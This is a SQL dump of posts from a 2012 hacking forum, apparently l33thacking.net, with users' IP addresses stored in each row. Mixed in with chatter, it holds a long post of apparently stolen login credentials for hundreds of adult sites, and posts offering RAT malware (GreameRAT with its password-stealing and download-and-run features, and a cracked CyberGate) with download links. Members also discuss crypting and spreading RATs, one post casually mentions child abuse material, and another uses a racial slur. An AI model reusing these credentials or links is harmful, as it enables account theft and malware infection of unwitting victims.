pid=\'4119\' dateline=\'1349842486\']\r\nYep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.\r\n[/quote]\r\n\r\n:roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up.\r\n\r\nI agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5b01673749b9eae1cb4b6f322edad2d', '0', '0'); INSERT INTO mybb_posts VALUES('4123', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1349845043', 'Oh yeh I was gonna ask about the awards. Sweet can\'t wait :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '4e22da64d0ae4fd9fa210260e163fc60', '0', '0'); INSERT INTO mybb_posts VALUES('4124', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349845641', 'Only Reloadzor can provide the PSD file because he created the logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fedccb7d9682e2483c74c80a06bfad0e', '0', '0'); INSERT INTO mybb_posts VALUES('4125', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '222', 'Exposé', '1349846236', 'ok thanks joker....hopefully we can get this installed :d', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '7560b2bd2a3d9832129f0883f5b5c539', '0', '0'); INSERT INTO mybb_posts VALUES('4126', '790', '0', '58', 'Unique - Recruitment', '0', '62', 'R?????zo?', '1349863144', '[color=#1E90FF][b]Unique - Recruitment[/b][/color]\r\nThis is Unique\'s Recruitment thread. \r\nPlease use the format below and post your application. \r\nDon\'t PM me about it or else I will deny it.\r\nAlso, don\'t request a Join Request because I will deny those too.\r\n\r\n[color=#1E90FF][b]Requirements[/b][/color]\r\n- Must have 50+ posts\r\n- Must have at least 3 threads (At least 1 tutorial, guide, ebook etc)\r\n- Must be HQ & Unique\r\n- Must have positive rep 10+\r\n- Must contribute a lot to L33tHacking\r\n\r\n[color=#1E90FF][b]Group Userbar[/b][/color]\r\n[img]http://l33thacking.net/images/ub/unique.gif[/img]\r\n\r\n[color=#1E90FF][b]Forum Icon[/b][/color]\r\n[img]http://i.imgur.com/qvfmJ.png[/img]\r\n\r\n[color=#1E90FF][u][b]Unique Group Application[/b][/u][/color]\r\n\r\n\r\n[code][b]Name:[/b] \r\n[b]Age:[/b] \r\n[b]Username: [/b]\r\n[b]Profile Link:[/b] \r\n[b]Are you Unique?:[/b] \r\n[b]Are you HQ?:[/b] \r\n[b]Why do you wish to get into our group?:[/b] \r\n[b]What will you do to contribute to Unique?:[/b][/code]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd654a8d3be288518a9037f237533835c', '0', '0'); INSERT INTO mybb_posts VALUES('4127', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349863282', 'I hope I learn something from you, I\'ve ratted before but my server ends up getting fucked all the time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f714902f3b6dcf8b1c7e85be38e759de', '0', '0'); INSERT INTO mybb_posts VALUES('4128', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '214', 'Rave™', '1349865147', 'Fucking survey, wowwww. Fix it or remove the thread.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '93e65ddb6afbc85d4e98086cf5142258', '0', '0'); INSERT INTO mybb_posts VALUES('4129', '716', '3643', '16', 'RE: Roku 2 XD', '0', '100', '??zg???g????61', '1349867311', 'Cool tutorial thanks. I\'m going to try this out.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '266ee112a08597ff073c8740ddb8c10a', '0', '0'); INSERT INTO mybb_posts VALUES('4130', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1349868202', 'That nigga named Theodore Bagwell...\nDidn\'t he die?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6dc07796d415709ae911a22522b9c1f1', '0', '0'); INSERT INTO mybb_posts VALUES('4131', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349868232', 'Nice. I see you changed the Forum Icon :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4b4bce9c6a021d510e5a87b9d2ab589', '0', '0'); INSERT INTO mybb_posts VALUES('4132', '790', '4131', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349869731', '[quote=\'iTzIpod\' pid=\'4131\' dateline=\'1349868232\']\r\nNice. I see you changed the Forum Icon :D\r\n[/quote]\r\n\r\nit\'s not changed yet, hopefully t3h jok3r changes it soon :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f0864a572b71021a5d4d0e3fefac6d1e', '0', '0'); INSERT INTO mybb_posts VALUES('4133', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '205', 'mothered', '1349870117', 'I don\'t use Skype, but shall forward this Info to friends.\r\n\r\nThanks for the heads up mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a43934b03f6b09e42006a5dea99cfc8c', '0', '0'); INSERT INTO mybb_posts VALUES('4134', '791', '0', '7', 'Are you a morning person?', '0', '205', 'mothered', '1349870340', 'Greetz everyone,\r\n\r\nAs the thread\'s title reads, are you a morning person?\r\n\r\nNo matter how many hours sleep I get, I\'m absolutely trashed In the morning. In particular, when the alarm goes off, and I try to force myself out of bed.\r\n\r\nYou guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd43372f64c60135095c31e7c161ed1c1', '0', '0'); INSERT INTO mybb_posts VALUES('4135', '791', '4134', '7', 'RE: Are you a morning person?', '0', '53', 'sirchamp', '1349870823', 'No. Im an evening guy. Go late to bed and get late up(if I can). I just had this topic in school.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8382cd65fc37e72f332b4e36964e2d6c', '0', '0'); INSERT INTO mybb_posts VALUES('4136', '654', '3226', '9', 'RE: Make money typing captchas', '0', '53', 'sirchamp', '1349871000', 'You will hardly make any money from this. Its like 1 dollar per 1000 words.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1982192343f479d724f9cd176ccc7152', '0', '0'); INSERT INTO mybb_posts VALUES('4137', '792', '0', '61', 'Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1349871284', 'I\'ve made a few rules that every member in Unique must follow in order to not get removed from the group.\n\n[color=#1E90FF][b]Unique Leaders:[/b][/color]\n\nCurrent leader: [url=http://l33thacking.net/user-62.html]R?????zo?[/URL]\nCo-Leader: [url=http://l33thacking.net/user-82.html]iTzIpod[/URL]\n\n[color=#1E90FF][b]The rules are:[/b][/color]\n\n[list]\n[*]You will not share anything that\'s in Unique forums, even if it\'s leaked.\n[*]We are a brotherhood, we will respect each other inside and outside Unique, I don\'t want to see anyone fighting because of stupid reasons.\n[*]You will not scam anyone, if I get to know our group name is been used in order to help your scam you will be removed permanently.\n[*]We are an invite only group, only most HQ and trustable members will be a part of it.\n[/list]\n\n\nIf you violate any of the rules above I will take serious actions or removing you from the group.\n\nRules will be updated again shortly once I think about it in more detail, suggestions are accepted too.', '94.132.244.168', '1585771688', '1', '0', '62', '1350229176', '1', 'd22019c3955c488fad1167bec139f142', '0', '1350229176'); INSERT INTO mybb_posts VALUES('4138', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1349872870', 'Ahh sorry about that, I leaked this from another website. Nothing I can do about it, sorry.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '8ffc2437aaa7def7ad036d0895db65d6', '0', '0'); INSERT INTO mybb_posts VALUES('4139', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349872911', ':D Glad I could help. I watch all my Anime on there.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '8ab40fce36cdf9effe4a5560a4a56ce1', '0', '0'); INSERT INTO mybb_posts VALUES('4140', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349872975', 'Actually its 0.75 per 1000 capachas xDDD', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '5bdd609155170f1a5fae34a837011060', '0', '0'); INSERT INTO mybb_posts VALUES('4141', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349873367', 'Hes been teaching me about ratting, I know a lot about networking, I also program Java, HTML and some php but I know hardly anything about ratting :) he explained it too me.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'ee4848d6292c5d61bf7141e991a10e5b', '0', '0'); INSERT INTO mybb_posts VALUES('4142', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '53', 'sirchamp', '1349873517', 'Already knew this. You can also watch kids porn there.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'cdf30c3f4e498d8679cda1ad3dc6eb99', '0', '0'); INSERT INTO mybb_posts VALUES('4143', '392', '3962', '9', 'RE: PPD Niches', '0', '228', 'VirtualLegend', '1349874577', '[quote=\'iTzIpod\' pid=\'3962\' dateline=\'1349734697\']\r\nGo on Leakforums and go on Skill\'s PPD thread.\r\n[/quote]\r\n\r\nThanks for the Tip', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f98300335231fbb9462076e6f723ee85', '0', '0'); INSERT INTO mybb_posts VALUES('4144', '410', '1890', '30', 'RE: Enhance Views Credits Booster', '0', '53', 'sirchamp', '1349875002', 'Double post. You have a thread with the exact same tool.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'a14263fbefe6edf2ebaa29af9cc32872', '0', '0'); INSERT INTO mybb_posts VALUES('4145', '793', '0', '9', 'How To Make $5+ A Hour | Even Your Grandma Can Do It', '17', '228', 'VirtualLegend', '1349876465', '[color=#9400D3][size=medium]Whats Up Money Makers,\r\n\r\nToday I\'m gonna show a site; [url=http://naturebucks.com/members/register.php?ref=VirtualLegend]naturebucks.com[/url]\r\nNatureBucks is a GPT site where you get paid to complete offers. The site has been online and paying for over a year now. So far there appears to be no major issues or any connection to past $cam sites. Site does not ask for any money or upgrades. So all you have to lose is your time. [/size][/color]\r\n\r\n[color=#C71585]Questions and Anwsers:\r\n\r\nQ: Do i need any stuff for this?\r\nA: Only a internet connection and a PC/laptop\r\n\r\nQ: Will this work in any country?\r\nA: Yes, even in the Sahara\r\n\r\nQ: Do i need any skills for this?\r\nA: No, even your Grandma can do it and i mean it\r\n\r\nQ: How much will i make with this?\r\nA: It is possible to make more than $5 a Hour[/color]\r\n\r\n[url=http://naturebucks.com/members/register.php?ref=VirtualLegend][img]http://naturebucks.com/images/banners/44.png[/img][/url]\r\n\r\n[color=#98FB98][size=medium]For Questions or help leave a post behind or contact me on skype: VirtualLegend[/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c14f969a44b3b4e6ec46ccc17f871897', '0', '0'); INSERT INTO mybb_posts VALUES('4146', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '228', 'VirtualLegend', '1349878392', 'Nice Ebook it will help people alot !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bc4b7ff4d6d2fc4c92f70151410f50d3', '0', '0'); INSERT INTO mybb_posts VALUES('4147', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349880458', 'il help anyone in need of it but im kinda busy spreading over youtube and my network so whenever i have the time il do my best to be there :)', '205.237.34.10', '-840097270', '1', '0', '0', '0', '1', '44d7a4aa1428a037f4d09b78dc187f97', '0', '0'); INSERT INTO mybb_posts VALUES('4166', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904065', 'Well for a free RAT its awesome I just mean compared to all other RATS its pretty lame. Oh and your post was HQ by the way ;)', '65.96.215.138', '1096865674', '1', '0', '100', '1349904089', '1', '16ee8184b2c89dfbf575e01c773aad5d', '0', '1349904089'); INSERT INTO mybb_posts VALUES('4149', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349882768', 'well I can setup a rat and stuff but when I try to crypt it doesnt work proprely anymore, I been using Darkcomet, is that one good enough?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7357aeebc39a76990360a757deaa16e1', '0', '0'); INSERT INTO mybb_posts VALUES('4150', '793', '4145', '9', 'RE: How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '53', 'sirchamp', '1349883068', 'Firstly this method already has been posted.(http://l33thacking.net/thread-773.html)\nThis works in every country but you cant make money in every country with it. It only has good offers for the USA and the Uk.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0ef09925cd827d977553597ce6a13dcc', '0', '0'); INSERT INTO mybb_posts VALUES('4151', '791', '4134', '7', 'RE: Are you a morning person?', '0', '61', 'NXK', '1349883297', 'You\'re exactly like me, that\'s why I just gave up on going to bed early, I go to sleep ay like 1am everyday and wake up at 6am daily.. My first 2 classes are hell.', '99.253.94.204', '1677549260', '1', '0', '61', '1349883319', '1', 'e5440bcbd2bd12a3e07e3ae2dbcea002', '0', '1349883319'); INSERT INTO mybb_posts VALUES('4152', '794', '0', '54', 'New XXX Porn Passwords: 10 Oct 2012', '0', '62', 'R?????zo?', '1349883791', 'Today 10/10/2012 Cracked Porn Site\'s Logins for people who enjoyed to watched.\r\n\r\nHave fun..\r\n\r\ncollegerules.com mood WALKER\r\nblacksonblondes.com Br42g87 Xg4823ph\r\nmembers.earlmiller.com pabelanet finesse\r\nmembers.guysluckyday.com johnny1 isvipebaby\r\nmembers.teendirtbags.com jhon ASh8ducqsTxBERUn\r\namberlynnonline.net monz78 70camaro\r\n3rd-art.com marsbug 122852\r\nmembers.stephanieswift.com zglabu access\r\nmeandmylatina.com ttttt99 bjornt\r\nmembers.suze.net stormch8ser51 stormy8\r\nauth.redclouds.com dilmun hemlock\r\nblacksonblondes.com accessjake picard\r\npolishbustyxxl.com forxxxhq birthday23\r\ngushbusters.com didge151 sigma151\r\nauntjudys.com finta 1576325\r\ntotallyhotxxx.com andrew88 98176890\r\nbethandaaron.com surgict ownzyou6\r\nsammy4u.com testibill ibilltes\r\namateurallure.com hpycpl hubby\r\nshaunasand.com DANDFA DFADAN\r\nindavip.net giampi09 squiggles\r\nmembers.movieerotica.com shadow8 biotch\r\nmembers.iwantamateurs.com msaleb bd1304\r\noralgirlfriends.com joker 5552000\r\nmembers.ultrampegs.com calbear Jennyff\r\nterimarieharrison.com MLForman Skeld123\r\npolishbustyxxl.com eztjol beszoptad\r\nudderlover.com BadAnakin BadJedi\r\nwillsheexplode.com light cell\r\nauntjudys.com webmaster hackerz\r\nballoonerotica.com julie456 julie456\r\nauth.redclouds.com alwynder mercedes\r\ngirlsgonewild.com Armando gato\r\nmembers.maturehotel.com ickasd weass\r\nassparade.bangbros.com doopster poopster\r\naprilsbodyshop.com reese21 denvo74\r\nmembers.gangbanglessons.com rainbow 1234qw\r\nrealgfstube.com dkw zen\r\nmembers.guysluckyday.com 00317235 1230749\r\nlavalush.com xkitten angels\r\nchromeonline.com zunga access\r\nmembers.stephanieswift.com steveo brandon\r\njugfuckers.com jhhiii tank1221\r\nmembers.sclorch.com review123 review12\r\nmynngf.com tricky hard\r\nnikkiziering.com gerhardt redshift\r\nblacksonblondes.com fin spring\r\nmembers.petitebeaver.com aburton th1n1n\r\ngirlsgonewild.com Bissdogg ironman6\r\njenniferwalcott.com Grenden 189201\r\nlatinofanclub.com shaker pepper\r\nmembers.maturehotel.com siadewalk surfer\r\ncybercheyenne.com dell50 pussy50\r\naamesummers.com natasha zolushka7\r\nsydneesteele.com 113000 whippet\r\nhardcore-janine.tv gtfullam sunny\r\npolishbustyxxl.com natasha zolushka0\r\ntwistys.com brianh surfboar\r\njizvideo.com 21535 52621\r\nmembers.yourfantasies.com dmanboy hotstuff\r\nblacksonblondes.com wrw1076 putcall\r\nmembers.villagepink.com iduex2 4hwcud\r\nmembers.momsneedcash.com wilson appolo13\r\naboutvoyeur.com j10e5d4 jed1054\r\nmembers.suze.net testpilot formula\r\ncrystalfilms.com bugite muffin\r\nmembers.hentaixxxsex.com ghost ghostbear\r\nrearend.com svolitch peezda\r\nblacksonblondes.com 1234 5678\r\ntiffanyparis.com Daantman angus01\r\nwatchmygf.com Donna skantz\r\nmembers.hotspermfacials.com 00264912 5588787\r\nmembers.teenslutsgonewild.com stisdnky butt\r\nindavip.net jeep1 3510\r\nclublove.com BAFATRUG1 SALLY1\r\ntalentgirls.com mobius4175 control\r\nshockathome.com moimoy ffffff\r\nadraianaventis.com 643typt 643typt\r\nmembers.cherokeexxx.com lhmmw2 462438\r\ndaily-desktops.com takasaka izumiman\r\nhentaiteengfs.com miyata carla\r\nmembers.gangbanglessons.com spleen spleen4\r\ngloryhole.com joeb68 lincolns\r\nlisadergan.com edferra12 scubadiv\r\ntagteamtranny.com uuuuuu daisy\r\nchelseacharms.com raider fastball\r\nsammy4u.com qwerty11 foobar\r\ntiffanytaylor.com Grenden 189201\r\nsammy4u.com parney marcie\r\nmembers.hentaifactory.nu truazenpnoy scorpion\r\naltniche.com jason jason\r\ndaily-desktops.com ErnstBlofeld newdawn\r\nsummergf.com snatch 974197\r\ngirlfriendorgasms.com haywww vette\r\natkarchives.com rjtre19 atk37rrs\r\nmembers.iboobs.com dfilippo ommra815\r\nmembers.hardcoremoviestation.com annette geoffrey\r\namateurcreampies.com exhibita hammer1\r\nmembers-main.com wizofid romance\r\nandrewblake.com mrtimm lovelife\r\naboutvoyeur.com cege tege\r\nbigmouthfuls.bangbros.com nennip ruskom\r\nblacksonblondes.com birkenhe 1golfer\r\nwillsheexplode.com dave2 hotrod\r\ngirlcreations.com RickyTX fountain\r\nmembers.stephanieswift.com nova58 access\r\ngirlsgonewild.com dlascell thermal\r\nblacksonblondes.com falcos oslolo\r\njenniferwalcott.com Stone55 55BGates\r\nblacksonblondes.com mhm30022 golf50\r\nmembers.orgyfantasy.com pussycat 4290\r\npolishbustyxxl.com delwyn el54621899\r\nbabylonxxx.com tyson lady\r\nmembers.herfirstdick.com butt plug\r\nimilfhunter.com aard vark\r\nmembers.iboobs.com dfilippo ommra815\r\nblackthumbs.net blackcunt seo9yjse\r\nlindseyvuolo.net tamarese fordsierra\r\nchromeonline.com sheet access\r\nblacksonblondes.com xeon666 hooters\r\naboutvoyeur.com forxxxhq birthday\r\nrealjapanesegfs.com micr vanses\r\nwrestlingvixxxens.com test1 test\r\nblacksonblondes.com qwerty qwerty\r\nexxoticplaces.com bigbill bigjim\r\nhardcore-janine.tv ficktjuv fick1tju\r\npolishbustyxxl.com tyke1170 nowayout\r\ncahottie.com pr0t3st lovesyou1322\r\nmembers.maturehotel.com fl00dA c0nfus3d\r\nerotic.com a12345 b12345\r\nwatchmygf.com ayrton dennis\r\ntiffanytaylor.com sx485969 349988\r\nbigmouthfuls.bangbros.com rosadod Dee17771\r\nassparade.bangbros.com summer winter\r\nneighborswife.com mthewho2 amanda\r\nmembers.asiancream.com dodsble1 trouble\r\namateurkeyclub.net dft_56 trotters\r\n@1st-sex-finder.com jkldfs uiorew\r\ntiffanygranath.com jaydog472 silent72\r\nwatchmygf.com guest maul\r\nmembers.petitebeaver.com gasdh50 rola\r\nmembers.wildlatinagirls.com icasd weass\r\nmembersmanager.com rileyrugger mustard\r\njohnholmes.com hoosie pauline\r\nadraianaventis.com blender radial9\r\nbarelyevil.com mlas002 slamslam\r\nmembers.hentaifactory.nu wap_bbs stirlitz\r\nnaughtyallie.com schlatz boooty\r\nkscans.com dn012704 3ip76k2\r\nmeatmembers.com Gadolman letmein\r\nstreamthevids.com clark112 webdev\r\nmembers.hisfirstthreesome.com philippe TYG5WkEbfpsqZMio\r\nrealpartygfs.com sexxman fuzzy\r\nstacyfuson.com doornx pikkels\r\nneighborswife.com unityrwe orange8\r\nterimarieharrison.com s1107d s4114d\r\nmembers.hugedickslittlechicks.com mccoompa murphy\r\nblacksonblondes.com 1brooks Happy\r\nmembers.villagepink.com wg308810 5ppeei\r\nmembers.momsneedcash.com webster052862 boog1962\r\nbitchisland.com aramasa 21363558\r\nblowtube.com 033314 320033\r\nassparade.bangbros.com norllib tangos\r\nmyebonygf.com casey radical\r\ncruisepatrol.com saladboy 98226DT\r\nbrazzers.com mneedle westside\r\namateurcreampies.com thikital nikonos\r\npolishbustyxxl.com dimas wapbbs\r\ngirlfriendaccess.com hewitt fuckit2\r\ngirlsgonewild.com rraven83 tahoe83\r\nnejcpass.com thesetup hatesyou\r\nchromeonline.com Pleujer access\r\nassparade.bangbros.com mahoura nounte\r\npolishbustyxxl.com forxxxhq birthday31\r\nmembersmanager.com neilelkins another1\r\ncoletteguimond.com red187 reg781\r\nmembers.hugedickslittlechicks.com newyork knicks\r\nwilderotica.net opopop11 sonyfuck\r\nmembers.asiancream.com laasder1 fire\r\nmembers.wildpass.com vinmal69 696969\r\nburningangel.com tst tst666\r\ninterracialschoolgirls.com rick rick\r\nkenmarcus.com Misiar access\r\ndaily-desktops.com fballxl5 scoobie\r\nclublove.com kpc955 555555\r\nlovettexxx.com KDENNIS FITTEC\r\nzerotolerance.com bubba farrid\r\nzerotolerance.com miles beach123\r\nbessiebardot.com 19234424 8266026\r\nudderlover.com postal porn\r\nblacksonblondes.com howlyn loveit\r\njizzonmygf.com ass1 matt\r\nbrazzers.com formula1 antigua\r\ncleavagelovers.com bobo bobo\r\ndirtywivesexposed.com sandy garth\r\nmembers.uncensoredextreme.com trouble porkey\r\nwww2.pictureview.com 994642 540713\r\ncollegetruelife.com 5424 thuy\r\npolishbustyxxl.com test123 test123\r\n4adultery.com 033314 320033\r\nmembers-main.com jamie1 stewart\r\naamesummers.com forxxxhq birthday7\r\nyummymama.com floyd8690 86908690\r\npreggysex.com edseebach xu71eab7\r\nmyebonygf.com lives jeffz\r\nmembers.jp18.com pswcompliance 3kH07nvz\r\nlisadergan.com dposton fahayek\r\neurofucktrip.org graysc trimner\r\npolishbustyxxl.com natasha zolushka5\r\nguysluckyday.ws maveri9243 username\r\nbigtitsroundasses.bangbros.com kobrey mykids22\r\nmembers.herfirstdick.com millkev2 wf5a2345\r\nshockathome.com joachim1 empire1\r\nlisadergan.com p2mask2y amasados\r\nclublove.com kpc955 555555\r\nbrutaldildos.com blippo10 Lance1\r\nmembers.sclorch.com all4u2c happynow\r\nblacksonblondes.com shminty 170111\r\ntrannypartygirls.com 1sadie 1buddy\r\ndumbandhorny.com prince nbvcxw\r\nrealitypasswords.com rabitt2005 130470\r\nmembers.triplexmembers.com jimh j082749h\r\neangirls.com foodking sierra\r\nmembers.nebraskacoeds.com dooley03 chicken0\r\nsummergf.com kitana1 john\r\ndaily-desktops.com elysium atheling\r\nwatchmygf.com stonie roman\r\nrachel18.com lalala 123456\r\nrealgfstube.com hotstuff pencil\r\nblacksonblondes.com kstromse joFQ5rjR\r\natkarchives.com 48502297 bob743\r\nfacialsz.com aw55tq8n jjjjjj\r\nsexmaidens.com bassingwell bassingwe\r\nclublove.com jarao iyaoyas\r\nmembers.collegefucktour.com morgan solomon\r\nyoung-men.com h4x0r3d 4zealots\r\nmembers.orgyfantasy.com klocek damiana\r\nchristilake.com goskier junker\r\nlisadergan.com upsben benups\r\ndaddy-videos.net jordanf degnan\r\nmikesapartmentonline.com nena nena\r\nbrazilxxx.com zeus00 hercules\r\nwatchmygf.com metoo busty\r\npolishbustyxxl.com forxxxhq birthday27\r\nauth.redclouds.com 29031996 comein\r\nmembers.uncensoredextreme.com jffleft heres\r\nwatchmygf.com greedmnt hammer\r\ncleavagelovers.com vickie vickie\r\nsupermodeltits.com larryd aolban\r\nhotlegsandfeet.com datapage produc\r\nmynonnudegf.com triko chowe\r\nmybbwgf.com raiser peters\r\nguysluckyday.ws gumby27 pokey\r\nmembers.hentaifactory.nu techman 777777\r\nrachel18.com DJMANNY 123456\r\nwatchmygf.com johnl 18teen\r\ntiffanytaylor.com fenwayl 340000\r\nmembers.ksexradio.com warlock1935 churin\r\nburningangel.com stevostheman billabon\r\nmembers.orgyfantasy.com oilme brandy\r\nblacksonblondes.com qwerty asdfg\r\ndaily-desktops.com rquaglia quags21\r\nwillsheexplode.com tull panic\r\nvideosz.com kekko radical\r\nechojohnson.net gherbe sterling\r\nblacksonblondes.com tltwin tonkatl\r\nstacys-dungeon.com itstime torock\r\npolishbustyxxl.com traxis praxis\r\ncollegerules.com LBB rebate\r\nchloevevrier.com dondolon 000321\r\nnudebeachpix.com opopop11 sonyfuck\r\nmembers.nebraskacoeds.com phish715 spencer\r\nmembers.hentaifactory.nu qbert alive\r\nmembers.simplyamateur.com shanghaijun 71864517\r\ndaily-desktops.com frozen_bootleg escupido\r\nsextoon.com 04279238 2547972\r\nmembers.ksexradio.com ahr 943\r\nbabylonxxx.com BADBEE Blue\r\nmikesapartmentonline.com brendan allison\r\nisabellasstockings.com forxxxhq birthday103\r\nassparade.bangbros.com drefly 2751223', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eff8f26282fe7bdae10cf6aa1a120ced', '0', '0'); INSERT INTO mybb_posts VALUES('4153', '793', '4150', '9', 'RE: How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '228', 'VirtualLegend', '1349884989', '[quote=\'sirchamp\' pid=\'4150\' dateline=\'1349883068\']\r\nFirstly this method already has been posted.(http://l33thacking.net/thread-773.html)\r\nThis works in every country but you cant make money in every country with it. It only has good offers for the USA and the Uk.\r\n[/quote]\r\n\r\nFirstly i wasn´t aware that the method already was posted. I Just want people to make money. I want to help the Money making community. Thanks for the feedback', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2075fbed26aa2e379623e385b05a9ad8', '0', '0'); INSERT INTO mybb_posts VALUES('4154', '795', '0', '15', 'GreameRAT 1.5', '0', '203', 'NeonLights', '1349886893', '[align=center][img]http://desmond.imageshack.us/Himg507/scaled.php?server=507&filename=image1ka.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg211/scaled.php?server=211&filename=image2lm.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg198/scaled.php?server=198&filename=image3gs.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg15/scaled.php?server=15&filename=image4ml.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg210/scaled.php?server=210&filename=image5ow.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg28/scaled.php?server=28&filename=image6en.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg831/scaled.php?server=831&filename=iamge7.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg641/scaled.php?server=641&filename=iamge8.png&res=landing[/img]\n[img]http://desmond.imageshack.us/Himg560/scaled.php?server=560&filename=image9oa.png&res=landing[/img]\n\nAvailable functions:\nClient Options \n- Change the interface (skins)\n- Dektop, Webcam an Audio Start Auto...\n- and more...\n\nServer Options \n- Uninstall\n- Disconnect\n- Update and more...\n\nExtra options \n- Passwords (Internet Explorer, Opera, Chrome, MSN, and others) \n- Open website \n- Run commands \n- Send files and run \n- Download and run \n- Proxy (http and https) \n- and more...\n\nFile Manager \n- List files (with information on each) \n- Preview image \n- Set wallpaper \n- Search files on your computer \n- and more...\n\nProcess Manager \n- List active processes (with information on each) \n- Kill or pause processes\n- and more...\n\nWindow Manager \n- List active windows (with information on each) \n- Close, minimize, restore, change window title\n- and more... \n\nServices Manager\n- List installed services (with information on each) \n- Install\n- Uninstall\n- and more...\n\nRegistry Manager\n- Works as Windows Regedit\n- Delete keys\n- Create keys\n- Manage StartUp programs\n- and more...\n\nClipboard Manager \n- Manages the contents of the clipboard (text and files) of the computer (Ctrl + C) \n\nDevices list\n- Shows all devices available on the computer \n\nActive ports \n- List active connections (with information on each)\n- Kill connections\n- and more...\n\nCommand Prompt \n- Works like DOS windows \n\nMiscellaneous\n- Restart, Shutdown and Log Off Windows \n- Open and close CD / DVD \n- Pause mouse \n- and more...\n\nCHAT \n- Talk directly to another computer \n\nMSN \n- Change MSN status \n...\nAnd more, more, more...\n\n[lock]\ndownload: http://ge.tt/2XeVlDN/v/0\nZipPass: 753\n[/lock]\n\nvirus scan: https://www.virustotal.com/file/1a0ad84f2893923b4f97053629200bd5bc06b75abd661fa25354627899556119/analysis/\n\nits safe u can ask lester to check it for you :P\n\nhope u guys enjoyed :)[/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011037', '1', '73bffc285099c1f458083f5bf7d4a68f', '0', '1352011037'); INSERT INTO mybb_posts VALUES('4155', '796', '0', '15', 'CyberGate v1.18.0 Full Version Cracked', '0', '203', 'NeonLights', '1349886978', '[align=center][img]http://up.arab-x.com/Dec10/RCx68008.png[/img]\n\nCyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. CyberGate RAT was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access. \n\n site official : http://www.cyber-software.org/website\n\n[lock]\nDownload CyberGate v1.18.0 Full Version Cracked : http://adf.ly/382489/https://www.dropbox.com/s/wi6l96rs006p1hw/CyberGate_v1.18.0%20-%20Crack%20Version%20By%20FreeHackToolsCom.rar\n\nOR\n\nmirror: http://adf.ly/382489/http://lh.rs/vQNTfjcP8vQ4\n[/lock]\n\nrun the loader NOT THE TRIAL!\n\n[/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011056', '1', 'fa98d1ef8ae98fa57cf7fd8419ee4deb', '0', '1352011056'); INSERT INTO mybb_posts VALUES('4156', '797', '0', '15', 'DarkComet RAT v5.3.1', '0', '203', 'NeonLights', 